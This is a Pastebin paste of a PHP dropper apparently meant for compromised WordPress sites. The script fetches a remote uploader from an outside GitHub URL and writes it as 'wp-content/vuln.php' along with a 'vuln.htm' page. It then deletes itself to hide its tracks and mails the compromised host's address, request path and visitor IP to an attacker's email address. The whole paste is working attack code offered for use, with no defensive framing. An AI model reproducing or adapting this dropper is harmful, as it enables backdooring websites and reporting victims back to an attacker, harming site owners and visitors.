Advertisement
Guest User

Untitled

a guest
Feb 22nd, 2020
408
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.32 KB | None | 0 0
  1. <title>Vuln!! patch it Now!MrSpyUp!!</title>
  2. <?php
  3. function http_get($url){
  4. $im = curl_init($url);
  5. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  6. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  7. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  8. curl_setopt($im, CURLOPT_HEADER, 0);
  9. return curl_exec($im);
  10. curl_close($im);
  11. }
  12. $check = $_SERVER['DOCUMENT_ROOT'] . "/wp-content/vuln.php" ;
  13. $text = http_get('https://raw.githubusercontent.com/MisterSpyx/PythonBot/master/files/up.php');
  14. $open = fopen($check, 'w');
  15. fwrite($open, $text);
  16. fclose($open);
  17. if(file_exists($check)){
  18. echo $check."</br>";
  19. }else
  20. echo "not exits";
  21. echo "done .\n " ;
  22.  
  23. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/vuln.htm" ;
  24. $text2 = http_get('https://raw.githubusercontent.com/MisterSpyx/PythonBot/master/files/vuln.txt');
  25. $open2 = fopen($check2, 'w');
  26. fwrite($open2, $text2);
  27. fclose($open2);
  28. if(file_exists($check2)){
  29. echo $check2."</br>";
  30. }else
  31. echo "not exits";
  32. echo "done .\n " ;
  33.  
  34. @unlink(__FILE__);
  35. ?>
  36. <?php
  37. $ip = getenv("REMOTE_ADDR");
  38. $ra44 = rand(1, 99999);
  39. $subj98 = " Bot V3 Rzlt |$ip";
  40. $email = "mrxmod1337@gmail.com";
  41. $from = "From: Result<botv3@mrspybotv3.com";
  42. $a45 = $_SERVER['REQUEST_URI'];
  43. $b75 = $_SERVER['HTTP_HOST'];
  44. $m22 = $ip . "";
  45. $msg8873 = "$a45 $b75 $m22";
  46. mail($email, $subj98, $msg8873, $from);
  47. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement